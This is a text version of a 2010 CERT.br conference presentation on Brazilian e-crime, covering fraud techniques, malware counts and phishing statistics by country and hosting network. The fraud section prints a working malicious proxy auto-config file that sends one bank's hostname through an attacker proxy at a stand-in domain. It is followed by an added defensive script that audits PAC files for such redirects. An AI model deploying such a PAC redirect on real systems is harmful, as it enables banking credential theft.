The Global eCrime Outlook
CERT.br National Report

Cristine Hoepers, [email protected]
CERT.br – Computer Emergency Response Team Brazil
NIC.br – Network Information Center Brazil
CGI.br – Brazilian Internet Steering Committee

APWG CeCOS IV, São Paulo, Brazil – May 11–13, 2010 – p. 1/12


About CERT.br

Created in 1997 as the national focal point to handle computer security incident reports and activities related to networks connected to the Internet in Brazil.
http://www.cert.br/mission.html


Our Parent Organization: CGI.br

Among the diverse responsibilities of the Brazilian Internet Steering Committee – CGI.br, the main attributions are:
• to propose policies and procedures related to the regulation of Internet activities
• to recommend standards for technical and operational procedures
• to establish strategic directives related to the use and development of the Internet in Brazil
• to promote studies and technical standards for the security of networks and services in the country
• to coordinate the allocation of Internet addresses (IPs) and the registration of domain names under <.br>
• to collect, organize and disseminate information on Internet services, including indicators and statistics


CGI.br/NIC.br Structure

01- Ministry of Science and Technology
02- Ministry of Communications
03- Presidential Cabinet
04- Ministry of Defense
05- Ministry of Development, Industry and Foreign Trade
06- Ministry of Planning, Budget and Management
07- National Telecommunications Agency
08- National Council of Scientific and Technological Development
09- National Forum of State Science and Technology Secretaries
10- Internet Expert
11- Internet Service Providers
12- Telecom Infrastructure Providers
13- Hardware and Software Industries
14- General Business Sector Users
15- Non-governmental Entity
16- Non-governmental Entity
17- Non-governmental Entity
18- Non-governmental Entity
19- Academia
20- Academia
21- Academia


Agenda

Fraud Techniques in Use
Malware Statistics
Phishing Monitoring
References


Fraud Techniques in Use (1/2)

• old tricks still prevalent
• malware modifying the client's hosts file
  – really old, but still very effective
• widespread use of drive-by downloads
  – several cases published by the media involving the main webpages of telecom and other big companies
• malware registering itself as a BHO (Browser Helper Object)


Fraud Techniques in Use (2/2)

• malware interacting with the real site in order to validate user information (account data, password, etc.)
  – making sandbox analysis harder
• malware modifying the browser's proxy auto-configuration settings to redirect users to phony pages

  example: http://evil.domain.example/network.pac

    function FindProxyForURL(url, host) {
        var a = "PROXY evil.domain.example:80";
        // only the targeted bank's hostname is routed through the attacker-controlled proxy
        if (shExpMatch(host, "www.my-bank.example")) {
            return a;
        }
        // every other host goes direct, so the victim notices nothing unusual
        return "DIRECT";
    }
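How a defender can check a PAC file for this kind of selective redirect, as an added example that is not from the CERT.br slides: the script compiles the PAC source together with a small subset of the standard PAC helper functions (shExpMatch, dnsDomainIs, isPlainHostName) and reports every watched hostname whose verdict is not DIRECT. The PAC text and the watch-list below are constructed for the demonstration; a real audit would feed in the PAC the browser is actually configured with.

```javascript
// Added example (not from the CERT.br deck): audit a proxy auto-config (PAC)
// script by evaluating its FindProxyForURL against hostnames we care about and
// flagging any that are routed through a proxy instead of going DIRECT.

// Constructed PAC source, modelled on the deck's evil.domain.example case.
const CONSTRUCTED_PAC = `
function FindProxyForURL(url, host) {
  var a = "PROXY evil.domain.example:80";
  if (shExpMatch(host, "www.my-bank.example")) { return a; }
  return "DIRECT";
}`;

// Minimal re-implementations of PAC helper functions a browser would provide.
function shExpMatch(str, pattern) {
  const re = '^' + pattern
    .replace(/[.+^${}()|[\]\\]/g, '\\$&') // escape regex metacharacters
    .replace(/\*/g, '.*')                  // shell glob *  -> any run
    .replace(/\?/g, '.') + '$';            // shell glob ?  -> one char
  return new RegExp(re).test(str);
}
function dnsDomainIs(host, domain) {
  return host === domain || host.endsWith(domain);
}
function isPlainHostName(host) {
  return !host.includes('.');
}

// Compile the PAC text in a function scope that only sees the helpers above,
// and hand back its FindProxyForURL so we can call it with our own hosts.
function loadPac(source) {
  const factory = new Function(
    'shExpMatch', 'dnsDomainIs', 'isPlainHostName',
    source + '\nreturn FindProxyForURL;');
  return factory(shExpMatch, dnsDomainIs, isPlainHostName);
}

// Return { host: verdict } for every watched host the PAC does not send DIRECT.
function auditPac(source, hosts) {
  const find = loadPac(source);
  const redirected = {};
  for (const host of hosts) {
    const verdict = String(find('https://' + host + '/', host)).trim();
    if (verdict.toUpperCase() !== 'DIRECT') redirected[host] = verdict;
  }
  return redirected;
}

// Constructed watch-list: the hostnames whose routing we want to verify.
const WATCHED_HOSTS = ['www.my-bank.example', 'www.other-bank.example', 'example.org'];
console.log(auditPac(CONSTRUCTED_PAC, WATCHED_HOSTS));
```

For the constructed PAC only www.my-bank.example is reported, with the verdict "PROXY evil.domain.example:80"; the other watched hosts come back DIRECT and are not listed.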
Malware Statistics

Malware* statistics, from 2006 to March 2010:

Category                                   2006     2007     2008     2009   2010 (1Q)
unique URLs                              25,087   19,981   17,376   10,864       2,798
unique malware samples (unique hashes)   19,148   16,946   14,256    8,151       1,870
AV signatures (unique)                    1,988    3,032    6,085    4,101       1,387
AV signatures (grouped by "family")         140      109       63       93          51
File extensions                              73      112      112      100          46
Domains                                   5,587    7,795    5,916    4,447       1,311
IP Addresses                              3,859    4,415    3,921    3,233         996
Country Codes                                75       83       78       76          53
Email notifications sent by CERT.br      18,839   17,483   15,499    9,935       2,236

(*) Includes {key,screen}loggers and trojan downloaders – does not include bots/botnets and worms


AV Vendors Efficiency

(chart only; no data survives in the text)


Phishing Monitoring (1/2)

                          2009-03-23 – 2009-12-31   2010-01-01 – 2010-04-30
Number of cases                              3332                      1968
  BR bank targets                            1916                      1412
  Other targets                              1416                       556
Unique URLs                                  3215                      1933
Unique hashes                                1672                       979
Domains                                      1619                      1343
IP Addresses                                 1344                      1182

Uptime (cases)
  ≤ 15 min                                     24                        12
  ≤ 1 hour                                    324                       237
  ≤ 6 hours                                   765                       442
  ≤ 12 hours                                  259                       129
  ≤ 1 day                                     361                       215
  ≤ 1 week                                   1100                       594
  > 1 week                                    499                       339

Uptime (max)                         218d 05h 26m              119d 23h 59m
Uptime (avg)                           4d 07h 12m                4d 15h 06m


Phishing Monitoring (2/2)

2009-03-23 – 2009-12-31

 #  Country Code   cases      %
 1  BR              1853  55.61
 2  US               897  26.92
 3  DE                81   2.43
 4  PA                69   2.07
 5  CA                43   1.29
 6  FR                40   1.20
 7  GB                39   1.17
 8  CN                38   1.14
 9  KR                35   1.05
10  AU                26   0.78

 #  ASN    (organization)     cases      %
 1  15201  (Universo Online)    575  17.20
 2  27715  (LocaWeb)            405  12.11
 3  8167   (Oi)                 121   3.62
 4  7738   (Oi)                 111   3.32
 5  21844  (ThePlanet)           98   2.93
 6  2914   (NTT America)         91   2.72
 7  7132   (AT&T)                84   2.51
 8  16397  (Comdominio)          79   2.36
 9  4230   (Embratel)            72   2.15
10  27990  (Hosting Panama)      68   2.03

2010-01-01 – 2010-04-30

 #  Country Code   cases      %
 1  BR               714  36.28
 2  US               618  31.40
 3  DE                97   4.93
 4  GB                56   2.85
 5  IT                55   2.79
 6  FR                54   2.74
 7  CN                35   1.78
 8  NL                32   1.63
 9  CA                28   1.42
10  AU                26   1.32

 #  ASN    (organization)     cases      %
 1  15201  (Universo Online)    119   6.01
 2  27715  (LocaWeb)            114   5.76
 3  21844  (ThePlanet)           86   4.35
 4  28299  (CYBERWEB)            80   4.04
 5  8167   (Oi)                  67   3.39
 6  11798  (Bluehost Inc.)       49   2.48
 7  2914   (NTT America)         48   2.43
 8  7738   (Oi)                  45   2.27
 9  46475  (Limestone)           42   2.12
10  16276  (OVH)                 40   2.02


References

• Brazilian Internet Steering Committee – CGI.br
  http://www.cgi.br/
• Network Information Center Brazil – NIC.br
  http://www.nic.br/
• Computer Emergency Response Team Brazil – CERT.br
  http://www.cert.br/